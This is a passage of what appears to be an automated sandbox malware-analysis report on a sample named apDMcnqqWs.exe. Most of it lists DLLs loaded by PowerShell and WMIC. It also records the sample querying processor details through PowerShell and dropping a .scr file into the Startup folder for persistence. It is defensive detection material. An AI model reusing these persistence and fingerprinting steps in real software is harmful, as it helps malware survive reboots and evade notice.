              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: apDMcnqqWs.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: apDMcnqqWs.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: apDMcnqqWs.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIERJump to behavior
              Source: apDMcnqqWs.exeStatic PE information: 0xF5959D04 [Sun Jul 25 18:23:00 2100 UTC]
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeCode function: 0_2_00007FFD34880D32 push eax; retn 3477h0_2_00007FFD34880E11
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeCode function: 0_2_00007FFD348800BD pushad ; iretd 0_2_00007FFD348800C1
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeCode function: 0_2_00007FFD34898173 push ebx; ret 0_2_00007FFD3489816A
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeCode function: 0_2_00007FFD348A1968 push eax; ret 0_2_00007FFD348A1BB1
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeCode function: 0_2_00007FFD34898163 push ebx; ret 0_2_00007FFD3489816A
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeCode function: 0_2_00007FFD34A56A35 pushad ; retf 0_2_00007FFD34A56A5D
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeCode function: 0_2_00007FFD34A4D715 push eax; retf 0_2_00007FFD34A4D761
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3478D2A5 pushad ; iretd 2_2_00007FFD3478D2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34972316 push 8B485F93h; iretd 2_2_00007FFD3497231B
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD348A19BB pushad ; ret 14_2_00007FFD348A19C9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFD348A1B40 pushad ; iretd 18_2_00007FFD348A1B4D

              Persistence and Installation Behavior

              barindex
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\4z5ru.scrJump to dropped file
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\4z5ru.scrJump to dropped file
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\4z5ru.scrJump to dropped file

              Boot Survival

              barindex
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\4z5ru.scrJump to dropped file
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\4z5ru.scrJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\4z5ru.scrJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\4z5ru.scr\:Zone.Identifier:$DATAJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
